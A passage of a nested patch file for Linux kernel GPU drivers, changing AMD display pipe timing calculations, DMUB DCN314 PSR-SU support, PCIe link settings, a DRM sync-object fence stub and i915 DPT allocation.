+ 		pipe = &res_ctx->pipe_ctx[i];
+ 		timing = &pipe->stream->timing;
+ 
+-		if (dc_extended_blank_supported(dc) && pipe->stream->adjust.v_total_max == pipe->stream->adjust.v_total_min
+-			&& pipe->stream->adjust.v_total_min > timing->v_total)
++		if (pipe->stream->adjust.v_total_min != 0)
+ 			pipes[pipe_cnt].pipe.dest.vtotal = pipe->stream->adjust.v_total_min;
++		else
++			pipes[pipe_cnt].pipe.dest.vtotal = timing->v_total;
++
++		pipes[pipe_cnt].pipe.dest.vblank_nom = timing->v_total - pipes[pipe_cnt].pipe.dest.vactive;
++		pipes[pipe_cnt].pipe.dest.vblank_nom = min(pipes[pipe_cnt].pipe.dest.vblank_nom, dcn3_14_ip.VBlankNomDefaultUS);
++		pipes[pipe_cnt].pipe.dest.vblank_nom = max(pipes[pipe_cnt].pipe.dest.vblank_nom, timing->v_sync_width);
++		pipes[pipe_cnt].pipe.dest.vblank_nom = min(pipes[pipe_cnt].pipe.dest.vblank_nom, max_allowed_vblank_nom);
+ 
+ 		if (pipe->plane_state &&
+ 				(pipe->plane_state->src_rect.height < pipe->plane_state->dst_rect.height ||
+@@ -327,8 +334,6 @@ int dcn314_populate_dml_pipes_from_context_fpu(struct dc *dc, struct dc_state *c
+ 		pipes[pipe_cnt].pipe.src.dcc_fraction_of_zs_req_luma = 0;
+ 		pipes[pipe_cnt].pipe.src.dcc_fraction_of_zs_req_chroma = 0;
+ 		pipes[pipe_cnt].pipe.dest.vfront_porch = timing->v_front_porch;
+-		pipes[pipe_cnt].pipe.dest.vblank_nom =
+-				dcn3_14_ip.VBlankNomDefaultUS / (timing->h_total / (timing->pix_clk_100hz / 10000.0));
+ 		pipes[pipe_cnt].pipe.src.dcc_rate = 3;
+ 		pipes[pipe_cnt].dout.dsc_input_bpc = 0;
+ 
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/dcn314/display_rq_dlg_calc_314.c b/drivers/gpu/drm/amd/display/dc/dml/dcn314/display_rq_dlg_calc_314.c
+index 61ee9ba063a78..26561c0f5fbb6 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/dcn314/display_rq_dlg_calc_314.c
++++ b/drivers/gpu/drm/amd/display/dc/dml/dcn314/display_rq_dlg_calc_314.c
+@@ -1053,7 +1053,6 @@ static void dml_rq_dlg_get_dlg_params(
+ 
+ 	float vba__refcyc_per_req_delivery_pre_l = get_refcyc_per_req_delivery_pre_l_in_us(mode_lib, e2e_pipe_param, num_pipes, pipe_idx) * refclk_freq_in_mhz;  // From VBA
+ 	float vba__refcyc_per_req_delivery_l = get_refcyc_per_req_delivery_l_in_us(mode_lib, e2e_pipe_param, num_pipes, pipe_idx) * refclk_freq_in_mhz;  // From VBA
+-	int blank_lines = 0;
+ 
+ 	memset(disp_dlg_regs, 0, sizeof(*disp_dlg_regs));
+ 	memset(disp_ttu_regs, 0, sizeof(*disp_ttu_regs));
+@@ -1077,17 +1076,10 @@ static void dml_rq_dlg_get_dlg_params(
+ 	min_ttu_vblank = get_min_ttu_vblank_in_us(mode_lib, e2e_pipe_param, num_pipes, pipe_idx);	// From VBA
+ 
+ 	dlg_vblank_start = interlaced ? (vblank_start / 2) : vblank_start;
+-	disp_dlg_regs->optimized_min_dst_y_next_start = disp_dlg_regs->min_dst_y_next_start;
+-	disp_dlg_regs->optimized_min_dst_y_next_start_us = 0;
+-	disp_dlg_regs->min_dst_y_next_start = (unsigned int) (((double) dlg_vblank_start) * dml_pow(2, 2));
+-	blank_lines = (dst->vblank_end + dst->vtotal_min - dst->vblank_start - dst->vstartup_start - 1);
+-	if (blank_lines < 0)
+-		blank_lines = 0;
+-	if (blank_lines != 0) {
+-		disp_dlg_regs->optimized_min_dst_y_next_start = vba__min_dst_y_next_start;
+-		disp_dlg_regs->optimized_min_dst_y_next_start_us = (disp_dlg_regs->optimized_min_dst_y_next_start * dst->hactive) / (unsigned int) dst->pixel_rate_mhz;
+-		disp_dlg_regs->min_dst_y_next_start = disp_dlg_regs->optimized_min_dst_y_next_start;
+-	}
++	disp_dlg_regs->min_dst_y_next_start_us =
++		(vba__min_dst_y_next_start * dst->hactive) / (unsigned int) dst->pixel_rate_mhz;
++	disp_dlg_regs->min_dst_y_next_start = vba__min_dst_y_next_start * dml_pow(2, 2);
++
+ 	ASSERT(disp_dlg_regs->min_dst_y_next_start < (unsigned int)dml_pow(2, 18));
+ 
+ 	dml_print("DML_DLG: %s: min_ttu_vblank (us)         = %3.2f\n", __func__, min_ttu_vblank);
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/dcn32/dcn32_fpu.c b/drivers/gpu/drm/amd/display/dc/dml/dcn32/dcn32_fpu.c
+index f28caece5f901..c89b761bcb926 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/dcn32/dcn32_fpu.c
++++ b/drivers/gpu/drm/amd/display/dc/dml/dcn32/dcn32_fpu.c
+@@ -1237,7 +1237,7 @@ static void dcn32_calculate_dlg_params(struct dc *dc, struct dc_state *context,
+ 				       display_e2e_pipe_params_st *pipes,
+ 				       int pipe_cnt, int vlevel)
+ {
+-	int i, pipe_idx;
++	int i, pipe_idx, active_hubp_count = 0;
+ 	bool usr_retraining_support = false;
+ 	bool unbounded_req_enabled = false;
+ 
+@@ -1282,6 +1282,8 @@ static void dcn32_calculate_dlg_params(struct dc *dc, struct dc_state *context,
+ 	for (i = 0, pipe_idx = 0; i < dc->res_pool->pipe_count; i++) {
+ 		if (!context->res_ctx.pipe_ctx[i].stream)
+ 			continue;
++		if (context->res_ctx.pipe_ctx[i].plane_state)
++			active_hubp_count++;
+ 		pipes[pipe_idx].pipe.dest.vstartup_start = get_vstartup(&context->bw_ctx.dml, pipes, pipe_cnt,
+ 				pipe_idx);
+ 		pipes[pipe_idx].pipe.dest.vupdate_offset = get_vupdate_offset(&context->bw_ctx.dml, pipes, pipe_cnt,
+@@ -1303,10 +1305,23 @@ static void dcn32_calculate_dlg_params(struct dc *dc, struct dc_state *context,
+ 
+ 		if (context->bw_ctx.bw.dcn.clk.dppclk_khz < pipes[pipe_idx].clks_cfg.dppclk_mhz * 1000)
+ 			context->bw_ctx.bw.dcn.clk.dppclk_khz = pipes[pipe_idx].clks_cfg.dppclk_mhz * 1000;
+-		context->res_ctx.pipe_ctx[i].plane_res.bw.dppclk_khz = pipes[pipe_idx].clks_cfg.dppclk_mhz * 1000;
++		if (context->res_ctx.pipe_ctx[i].plane_state)
++			context->res_ctx.pipe_ctx[i].plane_res.bw.dppclk_khz = pipes[pipe_idx].clks_cfg.dppclk_mhz * 1000;
++		else
++			context->res_ctx.pipe_ctx[i].plane_res.bw.dppclk_khz = 0;
+ 		context->res_ctx.pipe_ctx[i].pipe_dlg_param = pipes[pipe_idx].pipe.dest;
+ 		pipe_idx++;
+ 	}
++	/* If DCN isn't making memory requests we can allow pstate change and lower clocks */
++	if (!active_hubp_count) {
++		context->bw_ctx.bw.dcn.clk.socclk_khz = 0;
++		context->bw_ctx.bw.dcn.clk.dppclk_khz = 0;
++		context->bw_ctx.bw.dcn.clk.dcfclk_khz = 0;
++		context->bw_ctx.bw.dcn.clk.dcfclk_deep_sleep_khz = 0;
++		context->bw_ctx.bw.dcn.clk.dramclk_khz = 0;
++		context->bw_ctx.bw.dcn.clk.fclk_khz = 0;
++		context->bw_ctx.bw.dcn.clk.p_state_change_support = true;
++	}
+ 	/*save a original dppclock copy*/
+ 	context->bw_ctx.bw.dcn.clk.bw_dppclk_khz = context->bw_ctx.bw.dcn.clk.dppclk_khz;
+ 	context->bw_ctx.bw.dcn.clk.bw_dispclk_khz = context->bw_ctx.bw.dcn.clk.dispclk_khz;
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/display_mode_structs.h b/drivers/gpu/drm/amd/display/dc/dml/display_mode_structs.h
+index 64d602e6412f1..6af0d5f469aeb 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/display_mode_structs.h
++++ b/drivers/gpu/drm/amd/display/dc/dml/display_mode_structs.h
+@@ -618,8 +618,7 @@ struct _vcs_dpi_display_dlg_regs_st {
+ 	unsigned int refcyc_h_blank_end;
+ 	unsigned int dlg_vblank_end;
+ 	unsigned int min_dst_y_next_start;
+-	unsigned int optimized_min_dst_y_next_start;
+-	unsigned int optimized_min_dst_y_next_start_us;
++	unsigned int min_dst_y_next_start_us;
+ 	unsigned int refcyc_per_htotal;
+ 	unsigned int refcyc_x_after_scaler;
+ 	unsigned int dst_y_after_scaler;
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/display_mode_vba.c b/drivers/gpu/drm/amd/display/dc/dml/display_mode_vba.c
+index 8e6585dab20ef..1070cf8701960 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/display_mode_vba.c
++++ b/drivers/gpu/drm/amd/display/dc/dml/display_mode_vba.c
+@@ -569,6 +569,10 @@ static void fetch_pipe_params(struct display_mode_lib *mode_lib)
+ 		mode_lib->vba.OutputLinkDPRate[mode_lib->vba.NumberOfActivePlanes] = dout->dp_rate;
+ 		mode_lib->vba.ODMUse[mode_lib->vba.NumberOfActivePlanes] = dst->odm_combine_policy;
+ 		mode_lib->vba.DETSizeOverride[mode_lib->vba.NumberOfActivePlanes] = src->det_size_override;
++		if (src->det_size_override)
++			mode_lib->vba.DETBufferSizeInKByte[mode_lib->vba.NumberOfActivePlanes] = src->det_size_override;
++		else
++			mode_lib->vba.DETBufferSizeInKByte[mode_lib->vba.NumberOfActivePlanes] = ip->det_buffer_size_kbytes;
+ 		//TODO: Need to assign correct values to dp_multistream vars
+ 		mode_lib->vba.OutputMultistreamEn[mode_lib->vba.NumberOfActiveSurfaces] = dout->dp_multistream_en;
+ 		mode_lib->vba.OutputMultistreamId[mode_lib->vba.NumberOfActiveSurfaces] = dout->dp_multistream_id;
+@@ -783,6 +787,8 @@ static void fetch_pipe_params(struct display_mode_lib *mode_lib)
+ 					mode_lib->vba.pipe_plane[k] =
+ 							mode_lib->vba.NumberOfActivePlanes;
+ 					mode_lib->vba.DPPPerPlane[mode_lib->vba.NumberOfActivePlanes]++;
++					if (src_k->det_size_override)
++						mode_lib->vba.DETBufferSizeInKByte[mode_lib->vba.NumberOfActivePlanes] = src_k->det_size_override;
+ 					if (mode_lib->vba.SourceScan[mode_lib->vba.NumberOfActivePlanes]
+ 							== dm_horz) {
+ 						mode_lib->vba.ViewportWidth[mode_lib->vba.NumberOfActivePlanes] +=
+diff --git a/drivers/gpu/drm/amd/display/dmub/dmub_srv.h b/drivers/gpu/drm/amd/display/dmub/dmub_srv.h
+index b53468aca4a9b..5f17b252e9be4 100644
+--- a/drivers/gpu/drm/amd/display/dmub/dmub_srv.h
++++ b/drivers/gpu/drm/amd/display/dmub/dmub_srv.h
+@@ -350,6 +350,8 @@ struct dmub_srv_hw_funcs {
+ 
+ 	bool (*is_supported)(struct dmub_srv *dmub);
+ 
++	bool (*is_psrsu_supported)(struct dmub_srv *dmub);
++
+ 	bool (*is_hw_init)(struct dmub_srv *dmub);
+ 
+ 	bool (*is_phy_init)(struct dmub_srv *dmub);
+diff --git a/drivers/gpu/drm/amd/display/dmub/inc/dmub_cmd.h b/drivers/gpu/drm/amd/display/dmub/inc/dmub_cmd.h
+index 27a4ea7dc74ec..d8c05bc45957b 100644
+--- a/drivers/gpu/drm/amd/display/dmub/inc/dmub_cmd.h
++++ b/drivers/gpu/drm/amd/display/dmub/inc/dmub_cmd.h
+@@ -345,7 +345,7 @@ union dmub_fw_boot_status {
+ 		uint32_t optimized_init_done : 1; /**< 1 if optimized init done */
+ 		uint32_t restore_required : 1; /**< 1 if driver should call restore */
+ 		uint32_t defer_load : 1; /**< 1 if VBIOS data is deferred programmed */
+-		uint32_t reserved : 1;
++		uint32_t fams_enabled : 1; /**< 1 if VBIOS data is deferred programmed */
+ 		uint32_t detection_required: 1; /**<  if detection need to be triggered by driver */
+ 
+ 	} bits; /**< status bits */
+diff --git a/drivers/gpu/drm/amd/display/dmub/src/Makefile b/drivers/gpu/drm/amd/display/dmub/src/Makefile
+index 0589ad4778eea..caf095aca8f3f 100644
+--- a/drivers/gpu/drm/amd/display/dmub/src/Makefile
++++ b/drivers/gpu/drm/amd/display/dmub/src/Makefile
+@@ -22,7 +22,7 @@
+ 
+ DMUB = dmub_srv.o dmub_srv_stat.o dmub_reg.o dmub_dcn20.o dmub_dcn21.o
+ DMUB += dmub_dcn30.o dmub_dcn301.o dmub_dcn302.o dmub_dcn303.o
+-DMUB += dmub_dcn31.o dmub_dcn315.o dmub_dcn316.o
++DMUB += dmub_dcn31.o dmub_dcn314.o dmub_dcn315.o dmub_dcn316.o
+ DMUB += dmub_dcn32.o
+ 
+ AMD_DAL_DMUB = $(addprefix $(AMDDALPATH)/dmub/src/,$(DMUB))
+diff --git a/drivers/gpu/drm/amd/display/dmub/src/dmub_dcn31.c b/drivers/gpu/drm/amd/display/dmub/src/dmub_dcn31.c
+index c90b9ee42e126..89d24fb7024e2 100644
+--- a/drivers/gpu/drm/amd/display/dmub/src/dmub_dcn31.c
++++ b/drivers/gpu/drm/amd/display/dmub/src/dmub_dcn31.c
+@@ -297,6 +297,11 @@ bool dmub_dcn31_is_supported(struct dmub_srv *dmub)
+ 	return supported;
+ }
+ 
++bool dmub_dcn31_is_psrsu_supported(struct dmub_srv *dmub)
++{
++	return dmub->fw_version >= DMUB_FW_VERSION(4, 0, 59);
++}
++
+ void dmub_dcn31_set_gpint(struct dmub_srv *dmub,
+ 			  union dmub_gpint_data_register reg)
+ {
+diff --git a/drivers/gpu/drm/amd/display/dmub/src/dmub_dcn31.h b/drivers/gpu/drm/amd/display/dmub/src/dmub_dcn31.h
+index f6db6f89d45dc..eb62410941473 100644
+--- a/drivers/gpu/drm/amd/display/dmub/src/dmub_dcn31.h
++++ b/drivers/gpu/drm/amd/display/dmub/src/dmub_dcn31.h
+@@ -219,6 +219,8 @@ bool dmub_dcn31_is_hw_init(struct dmub_srv *dmub);
+ 
+ bool dmub_dcn31_is_supported(struct dmub_srv *dmub);
+ 
++bool dmub_dcn31_is_psrsu_supported(struct dmub_srv *dmub);
++
+ void dmub_dcn31_set_gpint(struct dmub_srv *dmub,
+ 			  union dmub_gpint_data_register reg);
+ 
+diff --git a/drivers/gpu/drm/amd/display/dmub/src/dmub_dcn314.c b/drivers/gpu/drm/amd/display/dmub/src/dmub_dcn314.c
+new file mode 100644
+index 0000000000000..f161aeb7e7c4a
+--- /dev/null
++++ b/drivers/gpu/drm/amd/display/dmub/src/dmub_dcn314.c
+@@ -0,0 +1,67 @@
++/*
++ * Copyright 2021 Advanced Micro Devices, Inc.
++ *
++ * Permission is hereby granted, free of charge, to any person obtaining a
++ * copy of this software and associated documentation files (the "Software"),
++ * to deal in the Software without restriction, including without limitation
++ * the rights to use, copy, modify, merge, publish, distribute, sublicense,
++ * and/or sell copies of the Software, and to permit persons to whom the
++ * Software is furnished to do so, subject to the following conditions:
++ *
++ * The above copyright notice and this permission notice shall be included in
++ * all copies or substantial portions of the Software.
++ *
++ * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
++ * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
++ * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.  IN NO EVENT SHALL
++ * THE COPYRIGHT HOLDER(S) OR AUTHOR(S) BE LIABLE FOR ANY CLAIM, DAMAGES OR
++ * OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
++ * ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
++ * OTHER DEALINGS IN THE SOFTWARE.
++ *
++ * Authors: AMD
++ *
++ */
++
++#include "../dmub_srv.h"
++#include "dmub_reg.h"
++#include "dmub_dcn314.h"
++
++#include "dcn/dcn_3_1_4_offset.h"
++#include "dcn/dcn_3_1_4_sh_mask.h"
++
++#define DCN_BASE__INST0_SEG0                       0x00000012
++#define DCN_BASE__INST0_SEG1                       0x000000C0
++#define DCN_BASE__INST0_SEG2                       0x000034C0
++#define DCN_BASE__INST0_SEG3                       0x00009000
++#define DCN_BASE__INST0_SEG4                       0x02403C00
++#define DCN_BASE__INST0_SEG5                       0
++
++#define BASE_INNER(seg) DCN_BASE__INST0_SEG##seg
++#define CTX dmub
++#define REGS dmub->regs_dcn31
++#define REG_OFFSET_EXP(reg_name) (BASE(reg##reg_name##_BASE_IDX) + reg##reg_name)
++
++/* Registers. */
++
++const struct dmub_srv_dcn31_regs dmub_srv_dcn314_regs = {
++#define DMUB_SR(reg) REG_OFFSET_EXP(reg),
++	{
++		DMUB_DCN31_REGS()
++		DMCUB_INTERNAL_REGS()
++	},
++#undef DMUB_SR
++
++#define DMUB_SF(reg, field) FD_MASK(reg, field),
++	{ DMUB_DCN31_FIELDS() },
++#undef DMUB_SF
++
++#define DMUB_SF(reg, field) FD_SHIFT(reg, field),
++	{ DMUB_DCN31_FIELDS() },
++#undef DMUB_SF
++};
++
++bool dmub_dcn314_is_psrsu_supported(struct dmub_srv *dmub)
++{
++	return dmub->fw_version >= DMUB_FW_VERSION(8, 0, 16);
++}
+diff --git a/drivers/gpu/drm/amd/display/dmub/src/dmub_dcn314.h b/drivers/gpu/drm/amd/display/dmub/src/dmub_dcn314.h
+new file mode 100644
+index 0000000000000..f213bd82c9110
+--- /dev/null
++++ b/drivers/gpu/drm/amd/display/dmub/src/dmub_dcn314.h
+@@ -0,0 +1,35 @@
++/*
++ * Copyright 2021 Advanced Micro Devices, Inc.
++ *
++ * Permission is hereby granted, free of charge, to any person obtaining a
++ * copy of this software and associated documentation files (the "Software"),
++ * to deal in the Software without restriction, including without limitation
++ * the rights to use, copy, modify, merge, publish, distribute, sublicense,
++ * and/or sell copies of the Software, and to permit persons to whom the
++ * Software is furnished to do so, subject to the following conditions:
++ *
++ * The above copyright notice and this permission notice shall be included in
++ * all copies or substantial portions of the Software.
++ *
++ * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
++ * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
++ * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.  IN NO EVENT SHALL
++ * THE COPYRIGHT HOLDER(S) OR AUTHOR(S) BE LIABLE FOR ANY CLAIM, DAMAGES OR
++ * OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
++ * ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
++ * OTHER DEALINGS IN THE SOFTWARE.
++ *
++ * Authors: AMD
++ *
++ */
++
++#ifndef _DMUB_DCN314_H_
++#define _DMUB_DCN314_H_
++
++#include "dmub_dcn31.h"
++
++extern const struct dmub_srv_dcn31_regs dmub_srv_dcn314_regs;
++
++bool dmub_dcn314_is_psrsu_supported(struct dmub_srv *dmub);
++
++#endif /* _DMUB_DCN314_H_ */
+diff --git a/drivers/gpu/drm/amd/display/dmub/src/dmub_srv.c b/drivers/gpu/drm/amd/display/dmub/src/dmub_srv.c
+index 92c18bfb98b3b..0dab22d794808 100644
+--- a/drivers/gpu/drm/amd/display/dmub/src/dmub_srv.c
++++ b/drivers/gpu/drm/amd/display/dmub/src/dmub_srv.c
+@@ -32,6 +32,7 @@
+ #include "dmub_dcn302.h"
+ #include "dmub_dcn303.h"
+ #include "dmub_dcn31.h"
++#include "dmub_dcn314.h"
+ #include "dmub_dcn315.h"
+ #include "dmub_dcn316.h"
+ #include "dmub_dcn32.h"
+@@ -226,12 +227,17 @@ static bool dmub_srv_hw_setup(struct dmub_srv *dmub, enum dmub_asic asic)
+ 	case DMUB_ASIC_DCN314:
+ 	case DMUB_ASIC_DCN315:
+ 	case DMUB_ASIC_DCN316:
+-		if (asic == DMUB_ASIC_DCN315)
++		if (asic == DMUB_ASIC_DCN314) {
++			dmub->regs_dcn31 = &dmub_srv_dcn314_regs;
++			funcs->is_psrsu_supported = dmub_dcn314_is_psrsu_supported;
++		} else if (asic == DMUB_ASIC_DCN315) {
+ 			dmub->regs_dcn31 = &dmub_srv_dcn315_regs;
+-		else if (asic == DMUB_ASIC_DCN316)
++		} else if (asic == DMUB_ASIC_DCN316) {
+ 			dmub->regs_dcn31 = &dmub_srv_dcn316_regs;
+-		else
++		} else {
+ 			dmub->regs_dcn31 = &dmub_srv_dcn31_regs;
++			funcs->is_psrsu_supported = dmub_dcn31_is_psrsu_supported;
++		}
+ 		funcs->reset = dmub_dcn31_reset;
+ 		funcs->reset_release = dmub_dcn31_reset_release;
+ 		funcs->backdoor_load = dmub_dcn31_backdoor_load;
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/smu11/sienna_cichlid_ppt.c b/drivers/gpu/drm/amd/pm/swsmu/smu11/sienna_cichlid_ppt.c
+index 1b7d93709a352..31835d96deef9 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/smu11/sienna_cichlid_ppt.c
++++ b/drivers/gpu/drm/amd/pm/swsmu/smu11/sienna_cichlid_ppt.c
+@@ -2081,89 +2081,36 @@ static int sienna_cichlid_display_disable_memory_clock_switch(struct smu_context
+ 	return ret;
+ }
+ 
+-static void sienna_cichlid_get_override_pcie_settings(struct smu_context *smu,
+-						      uint32_t *gen_speed_override,
+-						      uint32_t *lane_width_override)
+-{
+-	struct amdgpu_device *adev = smu->adev;
+-
+-	*gen_speed_override = 0xff;
+-	*lane_width_override = 0xff;
+-
+-	switch (adev->pdev->device) {
+-	case 0x73A0:
+-	case 0x73A1:
+-	case 0x73A2:
+-	case 0x73A3:
+-	case 0x73AB:
+-	case 0x73AE:
+-		/* Bit 7:0: PCIE lane width, 1 to 7 corresponds is x1 to x32 */
+-		*lane_width_override = 6;
+-		break;
+-	case 0x73E0:
+-	case 0x73E1:
+-	case 0x73E3:
+-		*lane_width_override = 4;
+-		break;
+-	case 0x7420:
+-	case 0x7421:
+-	case 0x7422:
+-	case 0x7423:
+-	case 0x7424:
+-		*lane_width_override = 3;
+-		break;
+-	default:
+-		break;
+-	}
+-}
+-
+-#define MAX(a, b)	((a) > (b) ? (a) : (b))
+-
+ static int sienna_cichlid_update_pcie_parameters(struct smu_context *smu,
+ 					 uint32_t pcie_gen_cap,
+ 					 uint32_t pcie_width_cap)
+ {
+ 	struct smu_11_0_dpm_context *dpm_context = smu->smu_dpm.dpm_context;
+ 	struct smu_11_0_pcie_table *pcie_table = &dpm_context->dpm_tables.pcie_table;
+-	uint32_t gen_speed_override, lane_width_override;
+-	uint8_t *table_member1, *table_member2;
+-	uint32_t min_gen_speed, max_gen_speed;
+-	uint32_t min_lane_width, max_lane_width;
+-	uint32_t smu_pcie_arg;
++	u32 smu_pcie_arg;
+ 	int ret, i;
+ 
+-	GET_PPTABLE_MEMBER(PcieGenSpeed, &table_member1);
+-	GET_PPTABLE_MEMBER(PcieLaneCount, &table_member2);
+-
+-	sienna_cichlid_get_override_pcie_settings(smu,
+-						  &gen_speed_override,
+-						  &lane_width_override);
++	/* PCIE gen speed and lane width override */
++	if (!amdgpu_device_pcie_dynamic_switching_supported()) {
++		if (pcie_table->pcie_gen[NUM_LINK_LEVELS - 1] < pcie_gen_cap)
++			pcie_gen_cap = pcie_table->pcie_gen[NUM_LINK_LEVELS - 1];
+ 
+-	/* PCIE gen speed override */
+-	if (gen_speed_override != 0xff) {
+-		min_gen_speed = MIN(pcie_gen_cap, gen_speed_override);
+-		max_gen_speed = MIN(pcie_gen_cap, gen_speed_override);
+-	} else {
+-		min_gen_speed = MAX(0, table_member1[0]);
+-		max_gen_speed = MIN(pcie_gen_cap, table_member1[1]);
+-		min_gen_speed = min_gen_speed > max_gen_speed ?
+-				max_gen_speed : min_gen_speed;
+-	}
+-	pcie_table->pcie_gen[0] = min_gen_speed;
+-	pcie_table->pcie_gen[1] = max_gen_speed;
++		if (pcie_table->pcie_lane[NUM_LINK_LEVELS - 1] < pcie_width_cap)
++			pcie_width_cap = pcie_table->pcie_lane[NUM_LINK_LEVELS - 1];
+ 
+-	/* PCIE lane width override */
+-	if (lane_width_override != 0xff) {
+-		min_lane_width = MIN(pcie_width_cap, lane_width_override);
+-		max_lane_width = MIN(pcie_width_cap, lane_width_override);
++		/* Force all levels to use the same settings */
++		for (i = 0; i < NUM_LINK_LEVELS; i++) {
++			pcie_table->pcie_gen[i] = pcie_gen_cap;
++			pcie_table->pcie_lane[i] = pcie_width_cap;
++		}
+ 	} else {
+-		min_lane_width = MAX(1, table_member2[0]);
+-		max_lane_width = MIN(pcie_width_cap, table_member2[1]);
+-		min_lane_width = min_lane_width > max_lane_width ?
+-				 max_lane_width : min_lane_width;
++		for (i = 0; i < NUM_LINK_LEVELS; i++) {
++			if (pcie_table->pcie_gen[i] > pcie_gen_cap)
++				pcie_table->pcie_gen[i] = pcie_gen_cap;
++			if (pcie_table->pcie_lane[i] > pcie_width_cap)
++				pcie_table->pcie_lane[i] = pcie_width_cap;
++		}
+ 	}
+-	pcie_table->pcie_lane[0] = min_lane_width;
+-	pcie_table->pcie_lane[1] = max_lane_width;
+ 
+ 	for (i = 0; i < NUM_LINK_LEVELS; i++) {
+ 		smu_pcie_arg = (i << 16 |
+diff --git a/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0.c b/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0.c
+index 2456f2a72defc..47fafb1fa6088 100644
+--- a/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0.c
++++ b/drivers/gpu/drm/amd/pm/swsmu/smu13/smu_v13_0.c
+@@ -2490,25 +2490,6 @@ int smu_v13_0_mode1_reset(struct smu_context *smu)
+ 	return ret;
+ }
+ 
+-/*
+- * Intel hosts such as Raptor Lake and Sapphire Rapids don't support dynamic
+- * speed switching. Until we have confirmation from Intel that a specific host
+- * supports it, it's safer that we keep it disabled for all.
+- *
+- * https://edc.intel.com/content/www/us/en/design/products/platforms/details/raptor-lake-s/13th-generation-core-processors-datasheet-volume-1-of-2/005/pci-express-support/
+- * https://gitlab.freedesktop.org/drm/amd/-/issues/2663
+- */
+-static bool smu_v13_0_is_pcie_dynamic_switching_supported(void)
+-{
+-#if IS_ENABLED(CONFIG_X86)
+-	struct cpuinfo_x86 *c = &cpu_data(0);
+-
+-	if (c->x86_vendor == X86_VENDOR_INTEL)
+-		return false;
+-#endif
+-	return true;
+-}
+-
+ int smu_v13_0_update_pcie_parameters(struct smu_context *smu,
+ 				     uint32_t pcie_gen_cap,
+ 				     uint32_t pcie_width_cap)
+@@ -2520,7 +2501,7 @@ int smu_v13_0_update_pcie_parameters(struct smu_context *smu,
+ 	uint32_t smu_pcie_arg;
+ 	int ret, i;
+ 
+-	if (!smu_v13_0_is_pcie_dynamic_switching_supported()) {
++	if (!amdgpu_device_pcie_dynamic_switching_supported()) {
+ 		if (pcie_table->pcie_gen[num_of_levels - 1] < pcie_gen_cap)
+ 			pcie_gen_cap = pcie_table->pcie_gen[num_of_levels - 1];
+ 
+diff --git a/drivers/gpu/drm/drm_syncobj.c b/drivers/gpu/drm/drm_syncobj.c
+index 0c2be83605258..e592c5da70cee 100644
+--- a/drivers/gpu/drm/drm_syncobj.c
++++ b/drivers/gpu/drm/drm_syncobj.c
+@@ -353,10 +353,10 @@ EXPORT_SYMBOL(drm_syncobj_replace_fence);
+  */
+ static int drm_syncobj_assign_null_handle(struct drm_syncobj *syncobj)
+ {
+-	struct dma_fence *fence = dma_fence_allocate_private_stub();
++	struct dma_fence *fence = dma_fence_allocate_private_stub(ktime_get());
+ 
+-	if (IS_ERR(fence))
+-		return PTR_ERR(fence);
++	if (!fence)
++		return -ENOMEM;
+ 
+ 	drm_syncobj_replace_fence(syncobj, fence);
+ 	dma_fence_put(fence);
+diff --git a/drivers/gpu/drm/i915/display/intel_dpt.c b/drivers/gpu/drm/i915/display/intel_dpt.c
+index a3893aff38611..ea8a08b9c0b11 100644
+--- a/drivers/gpu/drm/i915/display/intel_dpt.c
++++ b/drivers/gpu/drm/i915/display/intel_dpt.c
+@@ -163,6 +163,8 @@ struct i915_vma *intel_dpt_pin(struct i915_address_space *vm)
+ 		i915_vma_get(vma);
+ 	}
+ 
++	dpt->obj->mm.dirty = true;
++
+ 	atomic_dec(&i915->gpu_error.pending_fb_pin);
+ 	intel_runtime_pm_put(&i915->runtime_pm, wakeref);
+ 
+@@ -258,7 +260,7 @@ intel_dpt_create(struct intel_framebuffer *fb)
+ 		dpt_obj = i915_gem_object_create_stolen(i915, size);
+ 	if (IS_ERR(dpt_obj) && !HAS_LMEM(i915)) {
+ 		drm_dbg_kms(&i915->drm, "Allocating dpt from smem\n");
+-		dpt_obj = i915_gem_object_create_internal(i915, size);
++		dpt_obj = i915_gem_object_create_shmem(i915, size);
+ 	}
+ 	if (IS_ERR(dpt_obj))
+ 		return ERR_CAST(dpt_obj);
+diff --git a/drivers/gpu/drm/i915/gem/selftests/huge_pages.c b/drivers/gpu/drm/i915/gem/selftests/huge_pages.c
+index 436598f19522c..02fe7ea8c5df8 100644
+--- a/drivers/gpu/drm/i915/gem/selftests/huge_pages.c
++++ b/drivers/gpu/drm/i915/gem/selftests/huge_pages.c
+@@ -1185,8 +1185,10 @@ static int igt_write_huge(struct drm_i915_private *i915,
+ 	 * times in succession a possibility by enlarging the permutation array.
+ 	 */
+ 	order = i915_random_order(count * count, &prng);
+-	if (!order)
+-		return -ENOMEM;
++	if (!order) {
++		err = -ENOMEM;
++		goto out;
++	}
+ 
+ 	max_page_size = rounddown_pow_of_two(obj->mm.page_sizes.sg);
+ 	max = div_u64(max - size, max_page_size);
